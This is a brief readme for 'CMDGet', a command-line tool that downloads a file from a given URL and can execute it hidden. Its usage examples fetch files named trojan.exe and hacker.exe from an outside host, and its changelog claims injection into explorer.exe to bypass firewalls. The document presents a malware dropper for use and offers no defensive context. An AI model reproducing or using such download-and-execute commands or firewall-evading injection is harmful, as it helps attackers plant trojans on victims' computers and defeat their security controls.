Downloads a file from a website from user provided parameters
given from the commandline/shell , will execute the file hidden


Directions:
from the commandline/dos prompt/shell
type:
CMDGet <URL> <EXE> <0,1> 0 doesnt execute 1 will execute

( Example: CMDGet http://www.ymdown.com/trojan.exe c:\trojan.exe 0 ) will not execute
( Example: CMDGet http://ymdown.com/hacker.exe d:\windows\haha.exe 1 ) will execute

*New in 2.1 added the ability to download and execute or just download
*New in 2.0 added injection into explorer.exe to bypass firewalls
